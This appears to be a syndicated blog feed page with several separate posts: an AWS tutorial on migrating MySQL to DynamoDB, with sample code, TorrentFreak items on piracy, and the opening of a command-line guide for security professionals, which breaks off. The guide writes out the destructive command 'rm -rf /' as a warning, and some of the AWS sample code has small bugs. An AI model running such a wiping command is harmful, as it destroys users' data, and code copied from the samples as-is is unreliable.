Of course, something like this wouldn’t last five minutes in the West and certainly wouldn’t appear in a shopping mall, let alone Walmart. So TorrentFreak contacted Escape Computing, the company that appears to be behind the project, to find out more about their enterprise.

At the time of publication we had received no response, but we did manage to track down a job listing posted last year where the company sought an individual to act in a sales and technical capacity.

It’s not clear whether the position was filled but whoever got the job certainly has a unique role to fulfill in this unusual yet somewhat innovative project.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

Near Zero Downtime Migration from MySQL to DynamoDB

Post Syndicated from YongSeong Lee original https://aws.amazon.com/blogs/big-data/near-zero-downtime-migration-from-mysql-to-dynamodb/

Many companies consider migrating from relational databases like MySQL to Amazon DynamoDB, a fully managed, fast, highly scalable, and flexible NoSQL database service. For example, DynamoDB can increase or decrease capacity based on traffic, in accordance with business needs. The total cost of servicing can be optimized more easily than for the typical media-based RDBMS.

However, migrations can have two common issues:

  • Service outage due to downtime, especially when customer service must be seamlessly available 24/7/365
  • Different key design between RDBMS and DynamoDB

This post introduces two methods of seamlessly migrating data from MySQL to DynamoDB, minimizing downtime and converting the MySQL key design into one more suitable for NoSQL.

AWS services

I’ve included sample code that uses the following AWS services:

  • AWS Database Migration Service (AWS DMS) can migrate your data to and from most widely used commercial and open-source databases. It supports homogeneous and heterogeneous migrations between different database platforms.
  • Amazon EMR is a managed Hadoop framework that helps you process vast amounts of data quickly. Build EMR clusters easily with preconfigured software stacks that include Hive and other business software.
  • Amazon Kinesis can continuously capture and retain a vast amount of data such as transaction, IT logs, or clickstreams for up to 7 days.
  • AWS Lambda helps you run your code without provisioning or managing servers. Your code can be automatically triggered by other AWS services such Amazon Kinesis Streams.

Migration solutions

Here are the two options I describe in this post:

  1. Use AWS DMS

AWS DMS supports migration to a DynamoDB table as a target. You can use object mapping to restructure original data to the desired structure of the data in DynamoDB during migration.

  1. Use EMR, Amazon Kinesis, and Lambda with custom scripts

Consider this method when more complex conversion processes and flexibility are required. Fine-grained user control is needed for grouping MySQL records into fewer DynamoDB items, determining attribute names dynamically, adding business logic programmatically during migration, supporting more data types, or adding parallel control for one big table.

After the initial load/bulk-puts are finished, and the most recent real-time data is caught up by the CDC (change data capture) process, you can change the application endpoint to DynamoDB.

The method of capturing changed data in option 2 is covered in the AWS Database post Streaming Changes in a Database with Amazon Kinesis. All code in this post is available in the big-data-blog GitHub repo, including test codes.

Solution architecture

The following diagram shows the overall architecture of both options.

Option 1:  Use AWS DMS

This section discusses how to connect to MySQL, read the source data, and then format the data for consumption by the target DynamoDB database using DMS.

Create the replication instance and source and target endpoints

Create a replication instance that has sufficient storage and processing power to perform the migration job, as mentioned in the AWS Database Migration Service Best Practices whitepaper. For example, if your migration involves a large number of tables, or if you intend to run multiple concurrent replication tasks, consider using one of the larger instances. The service consumes a fair amount of memory and CPU.

As the MySQL user, connect to MySQL and retrieve data from the database with the privileges of SUPER, REPLICATION CLIENT. Enable the binary log and set the binlog_format parameter to ROW for CDC in the MySQL configuration. For more information about how to use DMS, see Getting Started  in the AWS Database Migration Service User Guide.

mysql> CREATE USER 'repl'@'%' IDENTIFIED BY 'welcome1';
mysql> GRANT all ON <database name>.* TO 'repl'@'%';
mysql> GRANT SUPER,REPLICATION CLIENT  ON *.* TO 'repl'@'%';

Before you begin to work with a DynamoDB database as a target for DMS, make sure that you create an IAM role for DMS to assume, and grant access to the DynamoDB target tables. Two endpoints must be created to connect the source and target. The following screenshot shows sample endpoints.

The following screenshot shows the details for one of the endpoints, source-mysql.

Create a task with an object mapping rule

In this example, assume that the MySQL table has a composite primary key (customerid + orderid + productid). You are going to restructure the key to the desired structure of the data in DynamoDB, using an object mapping rule.

In this case, the DynamoDB table has the hash key that is a combination of the customerid and orderid columns, and the sort key is the productid column. However, the partition key should be decided by the user in an actual migration, based on data ingestion and access pattern. You would usually use high-cardinality attributes. For more information about how to choose the right DynamoDB partition key, see the Choosing the Right DynamoDB Partition Key AWS Database blog post.

DMS automatically creates a corresponding attribute on the target DynamoDB table for the quantity column from the source table because rule-action is set to map-record-to-record and the column is not listed in the exclude-columns attribute list. For more information about map-record-to-record and map-record-to-document, see Using an Amazon DynamoDB Database as a Target for AWS Database Migration Service.

Migration starts immediately after the task is created, unless you clear the Start task on create option. I recommend enabling logging to make sure that you are informed about what is going on with the migration task in the background.

The following screenshot shows the task creation page.

You can use the console to specify the individual database tables to migrate and the schema to use for the migration, including transformations. On the Guided tab, use the Where section to specify the schema, table, and action (include or exclude). Use the Filter section to specify the column name in a table and the conditions to apply.

Table mappings also can be created in JSON format. On the JSON tab, check Enable JSON editing.

Here’s an example of an object mapping rule that determines where the source data is located in the target. If you copy the code, replace the values of the following attributes. For more examples, see Using an Amazon DynamoDB Database as a Target for AWS Database Migration Service.

  • schema-name
  • table-name
  • target-table-name
  • mapping-parameters
  • attribute-mappings
{
  "rules": [
   {
      "rule-type": "selection",
      "rule-id": "1",
      "rule-name": "1",
      "object-locator": {
        "schema-name": "mydatabase",
        "table-name": "purchase"
      },
      "rule-action": "include"
    },
    {
      "rule-type": "object-mapping",
      "rule-id": "2",
      "rule-name": "2",
      "rule-action": "map-record-to-record",
      "object-locator": {
        "schema-name": "mydatabase",
        "table-name": "purchase"
 
      },
      "target-table-name": "purchase",
      "mapping-parameters": {
        "partition-key-name": "customer_orderid",
        "sort-key-name": "productid",
        "exclude-columns": [
          "customerid",
          "orderid"           
        ],
        "attribute-mappings": [
          {
            "target-attribute-name": "customer_orderid",
            "attribute-type": "scalar",
            "attribute-sub-type": "string",
            "value": "${customerid}|${orderid}"
          },
          {
            "target-attribute-name": "productid",
            "attribute-type": "scalar",
            "attribute-sub-type": "string",
            "value": "${productid}"
          }
        ]
      }
    }
  ]
}

Start the migration task

If the target table specified in the target-table-name property does not exist in DynamoDB, DMS creates the table according to data type conversion rules for source and target data types. There are many metrics to monitor the progress of migration. For more information, see Monitoring AWS Database Migration Service Tasks.

The following screenshot shows example events and errors recorded by CloudWatch Logs.

DMS replication instances that you used for the migration should be deleted once all migration processes are completed. Any CloudWatch logs data older than the retention period is automatically deleted.

Option 2: Use EMR, Amazon Kinesis, and Lambda

This section discusses an alternative option using EMR, Amazon Kinesis, and Lambda to provide more flexibility and precise control. If you have a MySQL replica in your environment, it would be better to dump data from the replica.

Change the key design

When you decide to change your database from RDMBS to NoSQL, you need to find a more suitable key design for NoSQL, for performance as well as cost-effectiveness.

Similar to option #1, assume that the MySQL source has a composite primary key (customerid + orderid + productid). However, for this option, group the MySQL records into fewer DynamoDB items by customerid (hash key) and orderid (sort key). Also, remove the last column (productid) of the composite key by converting the record values productid column in MySQL to the attribute name in DynamoDB, and setting the attribute value as quantity.

This conversion method reduces the number of items. You can retrieve the same amount of information with fewer read capacity units, resulting in cost savings and better performance. For more information about how to calculate read/write capacity units, see Provisioned Throughput.

Migration steps

Option 2 has two paths for migration, performed at the same time:

  • Batch-puts: Export MySQL data, upload it to Amazon S3, and import into DynamoDB.
  • Real-time puts: Capture changed data in MySQL, send the insert/update/delete transaction to Amazon Kinesis Streams, and trigger the Lambda function to put data into DynamoDB.

To keep the data consistency and integrity, capturing and feeding data to Amazon Kinesis Streams should be started before the batch-puts process. The Lambda function should stand by and Streams should retain the captured data in the stream until the batch-puts process on EMR finishes. Here’s the order:

  1. Start real-time puts to Amazon Kinesis Streams.
  2. As soon as real-time puts commences, start batch-puts.
  3. After batch-puts finishes, trigger the Lambda function to execute put_item from Amazon Kinesis Streams to DynamoDB.
  4. Change the application endpoints from MySQL to DynamoDB.

Step 1:  Capture changing data and put into Amazon Kinesis Streams

Firstly, create an Amazon Kinesis stream to retain transaction data from MySQL. Set the Data retention period value based on your estimate for the batch-puts migration process. For data integrity, the retention period should be enough to hold all transactions until batch-puts migration finishes. However you do not necessarily need to select the maximum retention period. It depends on the amount of data to migrate.

In the MySQL configuration, set binlog_format to ROW to capture transactions by using the BinLogStreamReader module. The log_bin parameter must be set as well to enable the binlog. For more information, see the Streaming Changes in a Database with Amazon Kinesis AWS Database blog post.

 

[mysqld]
secure-file-priv = ""
log_bin=/data/binlog/binlog
binlog_format=ROW
server-id = 1
tmpdir=/data/tmp

The following sample code is a Python example that captures transactions and sends them to Amazon Kinesis Streams.

 

#!/usr/bin/env python
from pymysqlreplication import BinLogStreamReader
from pymysqlreplication.row_event import (
  DeleteRowsEvent,
  UpdateRowsEvent,
  WriteRowsEvent,
)

def main():
  kinesis = boto3.client("kinesis")

  stream = BinLogStreamReader(
    connection_settings= {
      "host": "<host IP address>",
      "port": <port number>,
      "user": "<user name>",
      "passwd": "<password>"},
    server_id=100,
    blocking=True,
    resume_stream=True,
    only_events=[DeleteRowsEvent, WriteRowsEvent, UpdateRowsEvent])

  for binlogevent in stream:
    for row in binlogevent.rows:
      event = {"schema": binlogevent.schema,
      "table": binlogevent.table,
      "type": type(binlogevent).__name__,
      "row": row
      }

      kinesis.put_record(StreamName="<Amazon Kinesis stream name>", Data=json.dumps(event), PartitionKey="default")
      print json.dumps(event)

if __name__ == "__main__":
main()

The following code is sample JSON data generated by the Python script. The type attribute defines the transaction recorded by that JSON record:

  • WriteRowsEvent = INSERT
  • UpdateRowsEvent = UPDATE
  • DeleteRowsEvent = DELETE
{"table": "purchase_temp", "row": {"values": {"orderid": "orderidA1", "quantity": 100, "customerid": "customeridA74187", "productid": "productid1"}}, "type": "WriteRowsEvent", "schema": "test"}
{"table": "purchase_temp", "row": {"before_values": {"orderid": "orderid1", "quantity": 1, "customerid": "customerid74187", "productid": "productid1"}, "after_values": {"orderid": "orderid1", "quantity": 99, "customerid": "customerid74187", "productid": "productid1"}}, "type": "UpdateRowsEvent", "schema": "test"}
{"table": "purchase_temp", "row": {"values": {"orderid": "orderid100", "quantity": 1, "customerid": "customerid74187", "productid": "productid1"}}, "type": "DeleteRowsEvent", "schema": "test"}

Step 2. Dump data from MySQL to DynamoDB

The easiest way is to use DMS, which recently added Amazon S3 as a migration target. For an S3 target, both full load and CDC data is written to CSV format. However, CDC is not a good fit as UPDATE and DELETE statements are not supported. For more information, see Using Amazon S3 as a Target for AWS Database Migration Service.

Another way to upload data to Amazon S3 is to use the INTO OUTFILE SQL clause and aws s3 sync CLI command in parallel with your own script. The degree of parallelism depends on your server capacity and local network bandwidth. You might find a third-party tool useful, such as pt-archiver (part of the Percona Toolkit see the appendix for details).

SELECT * FROM purchase WHERE <condition_1>
INTO OUTFILE '/data/export/purchase/1.csv' FIELDS TERMINATED BY ',' ESCAPED BY '\\' LINES TERMINATED BY '\n';
SELECT * FROM purchase WHERE <condition_2>
INTO OUTFILE '/data/export/purchase/2.csv' FIELDS TERMINATED BY ',' ESCAPED BY '\\' LINES TERMINATED BY '\n';
...
SELECT * FROM purchase WHERE <condition_n>
INTO OUTFILE '/data/export/purchase/n.csv' FIELDS TERMINATED BY ',' ESCAPED BY '\\' LINES TERMINATED BY '\n';

I recommend the aws s3 sync command for this use case. This command works internally with the S3 multipart upload feature. Pattern matching can exclude or include particular files. In addition, if the sync process crashes in the middle of processing, you do not need to upload the same files again. The sync command compares the size and modified time of files between local and S3 versions, and synchronizes only local files whose size and modified time are different from those in S3. For more information, see the sync command in the S3 section of the AWS CLI Command Reference.

$ aws s3 sync /data/export/purchase/ s3://<your bucket name>/purchase/ 
$ aws s3 sync /data/export/<other path_1>/ s3://<your bucket name>/<other path_1>/
...
$ aws s3 sync /data/export/<other path_n>/ s3://<your bucket name>/<other path_n>/ 

After all data is uploaded to S3, put it into DynamoDB. There are two ways to do this:

  • Use Hive with an external table
  • Write MapReduce code

Hive with an external table

Create a Hive external table against the data on S3 and insert it into another external table against the DynamoDB table, using the org.apache.hadoop.hive.dynamodb.DynamoDBStorageHandler property. To improve productivity and the scalability, consider using Brickhouse, which is a collection of UDFs for Hive.

The following sample code assumes that the Hive table for DynamoDB is created with the products column, which is of type ARRAY<STRING >.  The productid and quantity columns are aggregated, grouping by customerid and orderid, and inserted into the products column with the CollectUDAF columns provided by Brickhouse.

hive> DROP TABLE purchase_ext_s3; 
--- To read data from S3 
hive> CREATE EXTERNAL TABLE purchase_ext_s3 (
customerid string,
orderid    string,
productid  string,
quantity   string) 
ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' 
LOCATION 's3://<your bucket name>/purchase/';

Hive> drop table purchase_ext_dynamodb ; 
--- To connect to DynamoDB table  
Hive> CREATE EXTERNAL TABLE purchase_ext_dynamodb (
      customerid STRING, orderid STRING, products ARRAY<STRING>)
      STORED BY 'org.apache.hadoop.hive.dynamodb.DynamoDBStorageHandler' 
      TBLPROPERTIES ("dynamodb.table.name" = "purchase", 
      "dynamodb.column.mapping" = "customerid:customerid,orderid:orderid,products:products");

--- Batch-puts to DynamoDB using Brickhouse 
hive> add jar /<jar file path>/brickhouse-0.7.1-SNAPSHOT.jar ; 
hive> create temporary function collect as 'brickhouse.udf.collect.CollectUDAF';
hive> INSERT INTO purchase_ext_dynamodb 
select customerid as customerid , orderid as orderid
       ,collect(concat(productid,':' ,quantity)) as products
      from purchase_ext_s3
      group by customerid, orderid; 

Unfortunately, the MAP, LIST, BOOLEAN, and NULL data types are not supported by the  DynamoDBStorageHandler class, so the ARRAY<STRING> data type has been chosen. The products column of ARRAY<STRING> data type in Hive is matched to the StringSet type attribute in DynamoDB. The sample code mostly shows how Brickhouse works, and only for those who want to aggregate multiple records into one StringSet type attribute in DynamoDB.

Python MapReduce with Hadoop Streaming

A mapper task reads each record from the input data on S3, and maps input key-value pairs to intermediate key-value pairs. It divides source data from S3 into two parts (key part and value part) delimited by a TAB character (“\t”). Mapper data is sorted in order by their intermediate key (customerid and orderid) and sent to the reducer. Records are put into DynamoDB in the reducer step.

#!/usr/bin/env python
import sys
 
# get all lines from stdin
for line in sys.stdin:
    line = line.strip()
    cols = line.split(',')
# divide source data into Key and attribute part.
# example output : “cusotmer1,order1	product1,10”
    print '%s,%s\t%s,%s' % (cols[0],cols[1],cols[2],cols[3] )

Generally, the reduce task receives the output produced after map processing (which is key/list-of-values pairs) and then performs an operation on the list of values against each key.

In this case, the reducer is written in Python and is based on STDIN/STDOUT/hadoop streaming. The enumeration data type is not available. The reducer receives data sorted and ordered by the intermediate key set in the mapper, customerid and orderid (cols[0],cols[1]) in this case, and stores all attributes for the specific key in the item_data dictionary. The attributes in the item_data dictionary are put, or flushed, into DynamoDB every time a new intermediate key comes from sys.stdin.

#!/usr/bin/env python
import sys
import boto.dynamodb
 
# create connection to DynamoDB
current_keys = None
conn = boto.dynamodb.connect_to_region( '<region>', aws_access_key_id='<access key id>', aws_secret_access_key='<secret access key>')
table = conn.get_table('<dynamodb table name>')
item_data = {}

# input comes from STDIN emitted by Mapper
for line in sys.stdin:
    line = line.strip()
    dickeys, items  = line.split('\t')
    products = items.split(',')
    if current_keys == dickeys:
       item_data[products[0]]=products[1]  
    else:
        if current_keys:
          try:
              mykeys = current_keys.split(',') 
              item = table.new_item(hash_key=mykeys[0],range_key=mykeys[1], attrs=item_data )
              item.put() 
          except Exception ,e:
              print 'Exception occurred! :', e.message,'==> Data:' , mykeys
        item_data = {}
        item_data[products[0]]=products[1]
        current_keys = dickeys

# put last data
if current_keys == dickeys:
   print 'Last one:' , current_keys #, item_data
   try:
       mykeys = dickeys.split(',')
       item = table.new_item(hash_key=mykeys[0] , range_key=mykeys[1], attrs=item_data )
       item.put()
   except Exception ,e:
print 'Exception occurred! :', e.message, '==> Data:' , mykeys

To run the MapReduce job, connect to the EMR master node and run a Hadoop streaming job. The hadoop-streaming.jar file location or name could be different, depending on your EMR version. Exception messages that occur while reducers run are stored at the directory assigned as the –output option. Hash key and range key values are also logged to identify which data causes exceptions or errors.

$ hadoop fs -rm -r s3://<bucket name>/<output path>
$ hadoop jar /usr/lib/hadoop-mapreduce/hadoop-streaming.jar \
           -input s3://<bucket name>/<input path> -output s3://<bucket name>/<output path>\
           -file /<local path>/mapper.py -mapper /<local path>/mapper.py \
           -file /<local path>/reducer.py -reducer /<local path>/reducer.py

In my migration experiment using the above scripts, with self-generated test data, I found the following results, including database size and the time taken to complete the migration.

Server MySQL instance m4.2xlarge
EMR cluster

master : 1 x m3.xlarge

core  : 2 x m4.4xlarge

DynamoDB 2000 write capacity unit
Data Number of records 1,000,000,000
Database file size (.ibc) 100.6 GB
CSV files size 37 GB
Performance (time) Export to CSV 6 min 10 sec
Upload to S3 (sync) 3 min 30 sec
Import to DynamoDB depending on write capacity unit

 

The following screenshot shows the performance results by write capacity.

Note that the performance result is flexible and can vary depending on the server capacity, network bandwidth, degree of parallelism, conversion logic, program language, and other conditions. All provisioned write capacity units are consumed by the MapReduce job for data import, so the more you increase the size of the EMR cluster and write capacity units of DynamoDB table, the less time it takes to complete. Java-based MapReduce code would be more flexible for function and MapReduce framework.

Step 3: Amazon Lambda function updates DynamoDB by reading data from Amazon Kinesis

In the Lambda console, choose Create a Lambda function and the kinesis-process-record-python blueprint. Next, in the Configure triggers page, select the stream that you just created.

The Lambda function must have an IAM role with permissions to read from Amazon Kinesis and put items into DynamoDB.

The Lambda function can recognize the transaction type of the record by looking up the type attribute. The transaction type determines the method for conversion and update.

For example, when a JSON record is passed to the function, the function looks up the type attribute. It also checks whether an existing item in the DynamoDB table has the same key with the incoming record. If so, the existing item must be retrieved and saved in a dictionary variable (item, in this case). Apply a new update information command to the item dictionary before it is put back into DynamoDB table. This prevents the existing item from being overwritten by the incoming record.

from __future__ import print_function

import base64
import json
import boto3

print('Loading function')
client = boto3.client('dynamodb')

def lambda_handler(event, context):
    #print("Received event: " + json.dumps(event, indent=2))
    for record in event['Records']:
        # Amazon Kinesis data is base64-encoded so decode here
        payload = base64.b64decode(record['kinesis']['data'])
        print("Decoded payload: " + payload)
        data = json.loads(payload)
        
        # user logic for data triggered by WriteRowsEvent
        if data["type"] == "WriteRowsEvent":
            my_table = data["table"]
            my_hashkey = data["row"]["values"]["customerid"]
            my_rangekey = data["row"]["values"]["orderid"]
            my_productid = data["row"]["values"]["productid"]
            my_quantity = str( data["row"]["values"]["quantity"] )
            try:
                response = client.get_item( Key={'customerid':{'S':my_hashkey} , 'orderid':{'S':my_rangekey}} ,TableName = my_table )
                if 'Item' in response:
                    item = response['Item']
                    item[data["row"]["values"]["productid"]] = {"S":my_quantity}
                    result1 = client.put_item(Item = item , TableName = my_table )
                else:
                    item = { 'customerid':{'S':my_hashkey} , 'orderid':{'S':my_rangekey} , my_productid :{"S":my_quantity}  }
                    result2 = client.put_item( Item = item , TableName = my_table )
            except Exception, e:
                print( 'WriteRowsEvent Exception ! :', e.message  , '==> Data:' ,data["row"]["values"]["customerid"]  , data["row"]["values"]["orderid"] )
        
        # user logic for data triggered by UpdateRowsEvent
        if data["type"] == "UpdateRowsEvent":
            my_table = data["table"]
            
        # user logic for data triggered by DeleteRowsEvent    
        if data["type"] == "DeleteRowsEvent":
            my_table = data["table"]
            
            
    return 'Successfully processed {} records.'.format(len(event['Records']))

Step 4:  Switch the application endpoint to DynamoDB

Application codes need to be refactored when you change from MySQL to DynamoDB. The following simple Java code snippets focus on the connection and query part because it is difficult to cover all cases for all applications. For more information, see Programming with DynamoDB and the AWS SDKs.

Query to MySQL

The following sample code shows a common way to connect to MySQL and retrieve data.

import java.sql.* ;
...
try {
    Connection conn =  DriverManager.getConnection("jdbc:mysql://<host name>/<database name>" , "<user>" , "<password>");
    stmt = conn.createStatement();
    String sql = "SELECT quantity as quantity FROM purchase WHERE customerid = '<customerid>' and orderid = '<orderid>' and productid = '<productid>'";
    ResultSet rs = stmt.executeQuery(sql);

    while(rs.next()){ 
       int quantity  = rs.getString("quantity");   //Retrieve by column name 
       System.out.print("quantity: " + quantity);  //Display values 
       }
} catch (SQLException ex) {
    // handle any errors
    System.out.println("SQLException: " + ex.getMessage());}
...
==== Output ====
quantity:1
Query to DynamoDB

To retrieve items from DynamoDB, follow these steps:

  1. Create an instance of the DynamoDB
  2. Create an instance of the Table
  3. Add the withHashKey and withRangeKeyCondition methods to an instance of the QuerySpec
  4. Execute the query method with the querySpec instance previously created. Items are retrieved as JSON format, so use the getJSON method to look up a specific attribute in an item.
...
DynamoDB dynamoDB = new DynamoDB( new AmazonDynamoDBClient(new ProfileCredentialsProvider()));

Table table = dynamoDB.getTable("purchase");

QuerySpec querySpec = new QuerySpec()
        .withHashKey("customerid" , "customer1")  // hashkey name and its value 
        .withRangeKeyCondition(new RangeKeyCondition("orderid").eq("order1") ) ; // Ranage key and its condition value 

ItemCollection<QueryOutcome> items = table.query(querySpec); 

Iterator<Item> iterator = items.iterator();          
while (iterator.hasNext()) {
Item item = iterator.next();
System.out.println(("quantity: " + item.getJSON("product1"));   // 
}
...
==== Output ====
quantity:1

Conclusion

In this post, I introduced two options for seamlessly migrating data from MySQL to DynamoDB and minimizing downtime during the migration. Option #1 used DMS, and option #2 combined EMR, Amazon Kinesis, and Lambda. I also showed you how to convert the key design in accordance with database characteristics to improve read/write performance and reduce costs. Each option has advantages and disadvantages, so the best option depends on your business requirements.

The sample code in this post is not enough for a complete, efficient, and reliable data migration code base to be reused across many different environments. Use it to get started, but design for other variables in your actual migration.

I hope this post helps you plan and implement your migration and minimizes service outages. If you have questions or suggestions, please leave a comment below.

Appendix

To install the Percona Toolkit:

# Install Percona Toolkit

$ wget https://www.percona.com/downloads/percona-toolkit/3.0.2/binary/redhat/6/x86_64/percona-toolkit-3.0.2-1.el6.x86_64.rpm

$ yum install perl-IO-Socket-SSL

$ yum install perl-TermReadKey

$ rpm -Uvh percona-toolkit-3.0.2-1.el6.x86_64.rpm

# run pt-archiver

Example command:

$ pt-archiver –source h=localhost,D=blog,t=purchase –file ‘/data/export/%Y-%m-%d-%D.%t’  –where “1=1” –limit 10000 –commit-each

 


About the Author

Yong Seong Lee is a Cloud Support Engineer for AWS Big Data Services. He is interested in every technology related to data/databases and helping customers who have difficulties in using AWS services. His motto is “Enjoy life, be curious and have maximum experience.”

 

 

 


Converging Data Silos to Amazon Redshift Using AWS DMS

 

Pirate Bay’s Oldest Torrents Are ‘Teenagers’ Now

Post Syndicated from Ernesto original https://torrentfreak.com/pirate-bays-oldest-torrents-are-teenagers-now-170326/

The Pirate Bay is one of the most established brands on the Internet, but this certainly wasn’t the case 13 years ago.

The notorious torrent site was originally founded by Swedish pro-culture organization Piratbyrån, during the summer of 2003.

It was first hosted in Mexico, where Gottfrid Svartholm operated the site on a server owned by the company he was working for at the time. After a few months, it moved to Sweden, where Fredrik Neij ran the site and tracker from a Pentium III 1GHz laptop with 256MB of RAM.

While some of the site’s current users weren’t even born at the time, several of the torrents that were uploaded back then are still available today. This week the site’s longest surviving torrents turn thirteen years old. In other words, they’re teenagers now.

Below are the oldest listed torrents as of this week. An episode of “The High Chaparral” has the honor of being the oldest torrent. The file was originally uploaded on March 25, 2004, and although it lists zero seeders in the search results, there are still several people sharing it.

Pirate Bay’s oldest torrents listed

The ‘unofficial’ record hasn’t gone unnoticed to Pirate Bay users. Several commenters refer to the torrent’s achievement as the oldest surviving torrent on the site.

“Well, I guess since this is a part of TPB history i’ll add it to my Raspberry Pi torrent server to seed forever. Hopefully others will do the same,” one person writes in the comment section.

Other torrents that will soon reach teenager status are a copy of the first season of “Oz,” a book with “Top Secret Recipes,” and the “Revolution OS” documentary, which covers the history of Linux, GNU and the free software movement.

What’s most remarkable is that people are still sharing these files after all this time. A torrent only remains available if there’s at least one person sharing it. Over the years millions of torrents have stopped working, but these have weathered all the storms.

To give an idea of how many older torrents are still listed on The Pirate Bay, we looked at one of the site’s most recent database dumps.

Of the 60,000 torrents that were initially available on TPB at the end of 2004, roughly 3,000 are still online today. This number goes up to 10,000 for the 2006 torrents, and 300,000 of all torrents that were uploaded last year are still around.

Given the iconic status of the “High Chaparral” torrent, it’s not unthinkable that this one will live on to become an adult. That is, if The Pirate Bay itself is still operational in 2022.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

The command-line, for cybersec

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/01/the-command-line-for-cybersec.html

On Twitter I made the mistake of asking people about command-line basics for cybersec professionals. A got a lot of useful responses, which I summarize in this long (5k words) post. It’s mostly driven by the tools I use, with a bit of input from the tweets I got in response to my query.

bash

By command-line this document really means bash.

There are many types of command-line shells. Windows has two, ‘cmd.exe’ and ‘PowerShell’. Unix started with the Bourne shell ‘sh’, and there have been many variations of this over the years, ‘csh’, ‘ksh’, ‘zsh’, ‘tcsh’, etc. When GNU rewrote Unix user-mode software independently, they called their shell “Bourne Again Shell” or “bash” (queue “JSON Bourne” shell jokes here).

Bash is the default shell for Linux and macOS. It’s also available on Windows, as part of their special “Windows Subsystem for Linux”. The windows version of ‘bash’ has become my most used shell.

For Linux IoT devices, BusyBox is the most popular shell. It’s easy to clear, as it includes feature-reduced versions of popular commands.

man

‘Man’ is the command you should not run if you want help for a command.

Man pages are designed to drive away newbies. They are only useful if you already mostly an expert with the command you desire help on. Man pages list all possible features of a program, but do not highlight examples of the most common features, or the most common way to use the commands.

Take ‘sed’ as an example. It’s used most commonly to do a search-and-replace in files, like so:

$ sed ‘s/rob/dave/’ foo.txt

This usage is so common that many non-geeks know of it. Yet, if you type ‘man sed’ to figure out how to do a search and replace, you’ll get nearly incomprehensible gibberish, and no example of this most common usage.

I point this out because most guides on using the shell recommend ‘man’ pages to get help. This is wrong, it’ll just endlessly frustrate you. Instead, google the commands you need help on, or better yet, search StackExchange for answers.

You might try asking questions, like on Twitter or forum sites, but this requires a strategy. If you ask a basic question, self-important dickholes will respond by telling you to “rtfm” or “read the fucking manual”. A better strategy is to exploit their dickhole nature, such as saying “too bad command xxx cannot do yyy”. Helpful people will gladly explain why you are wrong, carefully explaining how xxx does yyy.

If you must use ‘man’, use the ‘apropos’ command to find the right man page. Sometimes multiple things in the system have the same or similar names, leading you to the wrong page.

apt-get install yum

Using the command-line means accessing that huge open-source ecosystem. Most of the things in this guide do no already exist on the system. You have to either compile them from source, or install via a package-manager. Linux distros ship with a small footprint, but have a massive database of precompiled software “packages” in the cloud somewhere. Use the “package manager” to install the software from the cloud.

On Debian-derived systems (like Ubuntu, Kali, Raspbian), type “apt-get install masscan” to install “masscan” (as an example). Use “apt-cache search scan” to find a bunch of scanners you might want to install.

On RedHat systems, use “yum” instead. On BSD, use the “ports” system, which you can also get working for macOS.

If no pre-compiled package exists for a program, then you’ll have to download the source code and compile it. There’s about an 80% chance this will work easy, following the instructions. There is a 20% chance you’ll experience “dependency hell”, for example, needing to install two mutually incompatible versions of Python.

Bash is a scripting language

Don’t forget that shells are really scripting languages. The bit that executes a single command is just a degenerate use of the scripting language. For example, you can do a traditional for loop like:

$ for i in $(seq 1 9); do echo $i; done

In this way, ‘bash’ is no different than any other scripting language, like Perl, Python, NodeJS, PHP CLI, etc. That’s why a lot of stuff on the system actually exists as short ‘bash’ programs, aka. shell scripts.

Few want to write bash scripts, but you are expected to be able to read them, either to tweek existing scripts on the system, or to read StackExchange help.

File system commands

The macOS “Finder” or Windows “File Explorer” are just graphical shells that help you find files, open, and save them. The first commands you learn are for the same functionality on the command-line: pwd, cd, ls, touch, rm, rmdir, mkdir, chmod, chown, find, ln, mount.

The command “rm –rf /” removes everything starting from the root directory. This will also follow mounted server directories, deleting files on the server. I point this out to give an appreciation of the raw power you have over the system from the command-line, and how easy you can disrupt things.

Of particular interest is the “mount” command. Desktop versions of Linux typically mount USB flash drives automatically, but on servers, you need to do it manually, e.g.:

$ mkdir ~/foobar
$ mount /dev/sdb ~/foobar

You’ll also use the ‘mount’ command to connect to file servers, using the “cifs” package if they are Windows file servers:

# apt-get install cifs-utils
# mkdir /mnt/vids
# mount -t cifs -o username=robert,password=foobar123  //192.168.1.11/videos /mnt/vids

Linux system commands

The next commands you’ll learn are about syadmin the Linux system: ps, top, who, history, last, df, du, kill, killall, lsof, lsmod, uname, id, shutdown, and so on.

The first thing hackers do when hacking into a system is run “uname” (to figure out what version of the OS is running) and “id” (to figure out which account they’ve acquired, like “root” or some other user).

The Linux system command I use most is “dmesg” (or ‘tail –f /var/log/dmesg’) which shows you the raw system messages. For example, when I plug in USB drives to a server, I look in ‘dmesg’ to find out which device was added so that I can mount it. I don’t know if this is the best way, it’s just the way I do it (servers don’t automount USB drives like desktops do).

Networking commands

The permanent state of the network (what gets configured on the next bootup) is configured in text files somewhere. But there are a wealth of commands you’ll use to view the current state of networking, make temporary changes, and diagnose problems.

The ‘ifconfig’ command has long been used to view the current TCP/IP configuration and make temporary changes. Learning how TCP/IP works means playing a lot with ‘ifconfig’. Use “ifconfig –a” for even more verbose information.

Use the “route” command to see if you are sending packets to the right router.

Use ‘arp’ command to make sure you can reach the local router.

Use ‘traceroute’ to make sure packets are following the correct route to their destination. You should learn the nifty trick it’s based on (TTLs). You should also play with the TCP, UDP, and ICMP options.

Use ‘ping’ to see if you can reach the target across the Internet. Usefully measures the latency in milliseconds, and congestion (via packet loss). For example, ping NetFlix throughout the day, and notice how the ping latency increases substantially during “prime time” viewing hours.

Use ‘dig’ to make sure DNS resolution is working right. (Some use ‘nslookup’ instead). Dig is useful because it’s the raw universal DNS tool – every time they add some new standard feature to DNS, they add that feature into ‘dig’ as well.

The ‘netstat –tualn’ command views the current TCP/IP connections and which ports are listening. I forget what the various options “tualn” mean, only it’s the output I always want to see, rather than the raw “netstat” command by itself.

You’ll want to use ‘ethtool –k’ to turn off checksum and segmentation offloading. These are features that break packet-captures sometimes.

There is this new fangled ‘ip’ system for Linux networking, replacing many of the above commands, but as an old timer, I haven’t looked into that.

Some other tools for diagnosing local network issues are ‘tcpdump’, ‘nmap’, and ‘netcat’. These are described in more detail below.

ssh

